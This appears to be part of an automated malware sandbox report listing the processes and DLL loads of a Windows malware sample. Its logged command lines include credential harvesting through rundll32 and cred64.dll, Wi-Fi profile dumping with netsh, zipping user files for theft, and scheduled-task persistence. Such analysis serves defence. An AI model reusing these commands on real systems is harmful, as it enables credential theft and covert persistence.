                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5540 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5660 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3632 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3872 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1636,i,5624198576768077496,445941079671464976,262144 /prefetch:8
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\netsh.exe
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1984,i,457568203381776828,11237095852378400144,262144 /prefetch:8
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe "C:\Users\user\AppData\Local\Temp\1000187001\build12.exe"
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: unknown unknown
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe
                              Source: C:\Windows\System32\rundll32.exeProcess created: unknown unknown
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: mstask.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: dui70.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: duser.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: chartv.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: oleacc.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: atlthunk.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: explorerframe.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: mstask.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: dui70.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: duser.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: chartv.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: onecoreuapcommonproxystub.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: oleacc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: atlthunk.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: textinputframework.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: coreuicomponents.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: coremessaging.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: ntmarta.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: wtsapi32.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: winsta.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: textshaping.dll
